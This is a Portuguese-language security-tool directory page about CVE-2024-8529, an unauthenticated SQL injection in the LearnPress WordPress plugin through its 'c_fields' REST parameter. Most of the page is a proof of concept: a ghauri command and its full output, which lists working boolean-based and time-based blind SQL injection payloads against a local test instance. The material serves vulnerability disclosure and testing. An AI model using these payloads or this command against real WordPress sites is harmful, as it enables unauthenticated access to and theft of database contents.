Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-8529 — LearnPress – Plugin LMS WordPress <= 4.2.7 - Injeção SQL não autenticada via 'c_fields' | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-8529
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoSegurança de Banco de Dados
GitHubrandomrobbiebf/cve-2024-8529

CVE-2024-8529

LearnPress – Plugin LMS WordPress <= 4.2.7 - Injeção SQL não autenticada via 'c_fields'

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-8529

LearnPress – WordPress LMS Plugin <= 4.2.7 - Injeção SQL Não Autenticada via 'c_fields'

Descrição

O plugin LearnPress – WordPress LMS Plugin para WordPress é vulnerável a Injeção SQL através do parâmetro 'c_fields' do endpoint da API REST /wp-json/lp/v1/courses/archive-course em todas as versões até, e incluindo, a 4.2.7, devido a escapamento insuficiente no parâmetro fornecido pelo usuário e falta de preparação adequada na consulta SQL existente. Isso possibilita que atacantes não autenticados anexem consultas SQL adicionais a consultas já existentes, que podem ser usadas para extrair informações sensíveis do banco de dados.

root@kitploit:~
Type: plugin
CVSS Score: 10
CVE: CVE-2024-8529
Slug: learnpress

Link para Download: Baixar learnpress Versão 4.2.7

POC

root@kitploit:~
ghauri -u "http://kubernetes.docker.internal:80/wp-json/learnpress/v1/courses?c_fields=title,description,duration,-start-date,-end-date" -p c_fields


  ________.__                        .__  {1.3.8}
 /  _____/|  |__ _____   __ _________|__|
/   \  ___|  |  \\__  \ |  |  \_  __ \  |
\    \_\  \   Y  \/ __ \|  |  /|  | \/  |
 \______  /___|  (____  /____/ |__|  |__|
        \/     \/     \/         https://github.com/r0oth3x49
                                 Uma ferramenta avançada de detecção e exploração de injeção SQL.



[*] iniciando às 21:49:47 /2024-10-12/

[21:49:47] [INFO] testando conexão com a URL alvo
[21:49:47] [INFO] testando se o conteúdo da URL alvo é estável
[21:49:48] [INFO] o conteúdo da URL alvo é estável
[21:49:48] [AVISO] o teste heurístico (básico) mostra que o parâmetro GET 'c_fields' pode não ser injetável
[21:49:48] [INFO] testando injeção SQL no parâmetro GET 'c_fields'
[21:49:48] [INFO] testando 'AND boolean-based blind - cláusula WHERE ou HAVING'
[21:49:54] [INFO] testando 'OR boolean-based blind - cláusula WHERE ou HAVING (NOT)'
[21:49:58] [INFO] testando 'OR boolean-based blind - cláusula WHERE ou HAVING'
[21:50:04] [INFO] testando 'Boolean-based blind - Substituição de parâmetro'
[21:50:07] [INFO] o parâmetro GET 'c_fields' parece ser injetável via 'Boolean-based blind - Substituição de parâmetro'
[21:50:07] [INFO] o teste heurístico (estendido) mostra que o SGBD de back-end pode ser 'MySQL'
parece que o SGBD de back-end é 'MySQL'. Deseja pular os payloads de teste específicos para outros SGBDs? [Y/n] n

[21:55:08] [INFO] testando 'MySQL >= 5.0.12 time-based blind (consulta SLEEP)'
[21:55:15] [INFO] o parâmetro GET 'c_fields' parece ser injetável via 'MySQL >= 5.0.12 time-based blind (consulta SLEEP)'
[21:55:15] [INFO] testando 'MySQL >= 5.0 AND error-based - cláusula WHERE, HAVING, ORDER BY ou GROUP BY (FLOOR)'
[21:55:15] [INFO] testando 'MySQL >= 5.1 AND error-based - cláusula WHERE, HAVING, ORDER BY ou GROUP BY (UPDATEXML)'
[21:55:15] [INFO] testando 'MySQL >= 5.1 AND error-based - cláusula WHERE, HAVING, ORDER BY ou GROUP BY (EXTRACTVALUE)'
[21:55:15] [INFO] testando 'MySQL >= 5.1 AND error-based - cláusula WHERE, HAVING, ORDER BY ou GROUP BY (UPDATEXML)'
[21:55:15] [INFO] testando 'MySQL >= 5.1 AND string error-based - cláusula WHERE, HAVING, ORDER BY ou GROUP BY (UPDATEXML)'
[21:55:15] [INFO] testando 'MySQL >= 5.1 AND error-based - cláusula WHERE, HAVING, ORDER BY ou GROUP BY (EXTRACTVALUE)'
[21:55:15] [INFO] verificando se o ponto de injeção no parâmetro GET 'c_fields' é um falso positivo
O parâmetro GET 'c_fields' está vulnerável. Deseja continuar testando os outros (se houver)? [y/N] n

Ghauri identificou o(s) seguinte(s) ponto(s) de injeção com um total de 109 requisições HTTP:
---
Parâmetro: c_fields (GET)
    Tipo: boolean-based blind
    Título: Boolean-based blind - Substituição de parâmetro
    Payload: c_fields=(SELECT (CASE WHEN (04869=4869) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))

    Tipo: time-based blind
    Título: MySQL >= 5.0.12 time-based blind (consulta SLEEP)
    Payload: c_fields=(SELECT(0)FROM(SELECT(SLEEP(7)))a)
---
[21:55:27] [INFO] testando MySQL
[21:55:27] [INFO] confirmando MySQL
[21:55:27] [INFO] o SGBD de back-end é MySQL

[21:55:27] [INFO] dados obtidos registrados em arquivos de texto sob '/Users/rwiggins/.ghauri/kubernetes.docker.internal'
Baixar ferramenta